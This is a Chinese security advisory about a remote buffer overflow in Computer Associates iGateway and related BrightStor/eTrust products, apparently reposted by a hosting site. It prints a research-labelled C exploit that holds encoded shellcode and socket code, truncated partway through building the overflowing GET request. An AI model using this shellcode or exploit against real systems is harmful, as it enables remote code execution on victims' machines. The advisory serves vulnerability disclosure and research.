Computer Associates多个产品HTTP请求远程溢出漏洞

发布日期：2005-10-08
更新日期：2005-10-08

受影响系统：

Computer Associates BrightStor ARCserve Backup
Computer Associates BrightStor Enterprise Backup
Computer Associates eTrust Audit iRecorders 1.5 SP3
Computer Associates eTrust Audit iRecorders 1.5 SP2
Computer Associates BrightStor SRM 7.3 (Windows)
Computer Associates BrightStor SRM 7.2 (Windows)
Computer Associates BrightStor Portal 11.1
Computer Associates BrightStor Portal 1.1
Computer Associates BrightStor Portal 1.0
Computer Associates BrightStor ARCserve Backup Agent
Computer Associates BrightStor ARCserve ARCServe 2000 Advanced Edition
Computer Associates BrightStor ARCserve ARCServe 2000
Computer Associates BrightStor ARCserve 2000 Backup

描述：

---

BUGTRAQ ID: 15025

Computer Associates是世界领先的安全厂商，产品包括多种杀毒软件。

多个Computer Associates产品中存在远程溢出漏洞，起因是没有对用户数据进行正确的边界检查，可能允许攻击者执行任意机器代码。请注意目前还不清楚具体有哪些产品存在漏洞，因此将所有Computer Associates产品都列为受影响产品。

<*来源：EMendoza （erikam@gmail.com）
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*ca igateway debug remote overflow -egm erikam@gmail.com*/
/*01.30.05*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>

const int MAXSIZE = 17110;

char sc[] = //metasploit
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d"
"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79"
"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01"
"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d"
"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc"
"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35"
"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15"
"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf"
"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e\x1e\xc5\x62\x4d\x92\x27\x55\xd2"
"\x80\x0b\x06\x49\x92\x21\x62\x90\x88\x91\xbc\xf4\x65\xf5\x68\x73"
"\x6f\x08\xed\x71\xb4\xfe\xc8\xb4\x3a\x08\xeb\x4a\x3e\xa4\x6e\x4a"
"\x2e\xa4\x7e\x4a\x92\x27\x5b\x71\x6b\x58\x5b\x4a\xe4\x16\xa8\x71"
"\xc9\xed\x4d\xde\x3a\x08\xeb\x73\x7d\xa6\x68\xe6\xbd\x9f\x99\xb4"
"\x43\x1e\x6a\xe6\xbb\xa4\x68\xe6\xbd\x9f\xd8\x50\xeb\xbe\x6a\xe6"
"\xbb\xa7\x69\x4d\x38\x08\xed\x8a\x05\x10\x44\xdf\x14\xa0\xc2\xcf"
"\x38\x08\xed\x7f\x07\x93\x5b\x71\x0e\x9a\xb4\xfc\x07\xa7\x64\x30"
"\xa1\x7e\xda\x73\x29\x7e\xdf\x28\xad\x04\x97\xe7\x2f\xda\xc3\x5b"
"\x41\x64\xb0\x63\x55\x5c\x96\xb2\x05\x85\xc3\xaa\x7b\x08\x48\x5d"
"\x92\x21\x66\x4e\x3f\xa6\x6c\x48\x07\xf6\x6c\x48\x38\xa6\xc2\xc9"
"\x05\x5a\xe4\x1c\xa3\xa4\xc2\xcf\x07\x08\xc2\x2e\x92\x27\xb6\x4e"
"\x91\x74\xf9\x7d\x92\x21\x6f\xe6\xbd\x9f\xcd\x93\x69\xa8\x6e\xe6"
"\xbb\x08\xed\x19\x6d\xf7";

int tcp_connect(char *host,int port) {

struct hostent *hp;
struct sockaddr_in addr;
int sock;

if (!(hp=gethostbyname(host))){
fprintf(stderr,"Something died! \n");
return -1;
}

memset(&addr,0,sizeof(addr));
addr.sin_addr=*(struct in_addr*)hp->h_addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(port);

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
fprintf(stderr,"Dead again!\n");
return -1;
}

if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){
fprintf(stderr,"Dead once more! \n");
return -1;
}
return sock;
}

/*Just supply a target ./caigw-win32 hostname */
int main(int argc, char *argv[])
{
char buffer[MAXSIZE 1];
int i = 0;
int sclen = sizeof(sc), sock = 0;

if(!argv[1])
return 0;

memset(buffer,'\x90',MAXSIZE/2);

memcpy(buffer,"GET",3);

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!